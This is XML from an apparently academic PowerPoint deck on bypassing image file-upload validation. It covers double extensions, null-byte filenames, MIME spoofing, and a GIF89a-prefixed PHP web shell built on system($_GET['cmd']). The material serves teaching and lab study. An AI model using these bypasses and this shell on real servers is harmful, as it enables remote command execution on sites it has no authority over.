              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blacklisting MIME types is also a method of file upload validation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() function will determine the size of any supported given image file and return the dimensions along with the file type and a height/width text string to be used inside a normal HTML IMG tag and the correspondent HTTP content type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="530352" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF1D104-1FCC-B442-B69E-92D9B28691D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873841" y="6453386"/>
            <a:ext cx="9506309" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Source: https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52150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Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Image File Upload Bypass Techniques</a:t>
            </a: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4B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26783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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>File extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>File upload mechanisms are very common on websites, but sometimes have poor validation. This allows attackers to upload malicious files to the web server, which can then be executed by other users or the server itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be bypassed by using alternate extensions or even unrelated ones. For example, it might be possible to upload and execute a .php file simply by renaming it file.php.jpg or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file.PHp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176836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Exploiting File Extensions:  Double extensions and Null Bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some cases it may be possible to use double extensions.  Some web servers may allow double extensions.  The use of double extensions can make the file appear as an image, but it can also contain code that can be executed remotely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, a hacker could rename a malicious file from  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>reverse_shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>reverse_shell.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a null byte is encountered in the filename any text following the null byte will be ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, a hacker could rename a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>reverse_shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> reverse_shell.jpg%00.php  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The upload application will not read any text after %00 and therefore a php file could be uploaded.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363233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Mime-type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3401129"/>
            <a:ext cx="6096000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Normal php MIME type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Content-type: application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Replace with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Content-type: image/jpeg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353993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Exploiting mime-type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GIF89a; header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The easy way is to trick the mime-type security check in order to think that the file we’ve uploaded is an image but in reality the web server is going to recognize it as a PHP script file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GIF89a is a GIF file header. If uploaded content is being scanned, sometimes the check can be fooled by putting this header item at the top of shellcode:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B44B1F57-4637-4AC3-8639-D0D62D6941E4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="4409986"/>
            <a:ext cx="6096000" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>GIF89a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>']); # shellcode goes here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69666042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{D3F97B07-7D00-C440-9FD7-58F8CFB5495E}tf10001072</Template>
  <TotalTime>824</TotalTime>
  <Words>2019</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>182</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 Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Crop</vt:lpstr>
      <vt:lpstr>Bypassing File Upload Restrictions</vt:lpstr>
      <vt:lpstr>Overview and Objective</vt:lpstr>
      <vt:lpstr>Requirements for this attack to work</vt:lpstr>
      <vt:lpstr>Image File Upload Restrictions</vt:lpstr>
      <vt:lpstr>Image File Upload Bypass Techniques</vt:lpstr>
      <vt:lpstr>File extensions</vt:lpstr>
      <vt:lpstr>Exploiting File Extensions:  Double extensions and Null Bytes</vt:lpstr>
      <vt:lpstr>Mime-type</vt:lpstr>
      <vt:lpstr>Exploiting mime-type</vt:lpstr>
      <vt:lpstr>Exploiting mime-type (contd.)</vt:lpstr>
      <vt:lpstr>Hexedit example</vt:lpstr>
      <vt:lpstr>Exploiting mime-type (contd.)</vt:lpstr>
      <vt:lpstr>Exploit php getimagesize()</vt:lpstr>
      <vt:lpstr>Failed Exploits</vt:lpstr>
      <vt:lpstr>Successful Exploit</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Simple Image Upload Interface</vt:lpstr>
      <vt:lpstr>Upload Validation   The code implements ALL image file upload restrictions:  file extensions, mime-type, and getimagesize()</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Environment</vt:lpstr>
      <vt:lpstr>Steps for executing the attack </vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Remote server configuration for future exploits</vt:lpstr>
      <vt:lpstr>On the attack machine (192.168.1.205) type:</vt:lpstr>
      <vt:lpstr>Limitations</vt:lpstr>
      <vt:lpstr>Future Work </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Montclair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Bypassing File Upload Restrictions</dc:title>
  <dc:creator>Christopher S Leberknight</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-03T14:24:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-11T02:23:16Z</dcterms:modified>
</cp:coreProperties>
</file>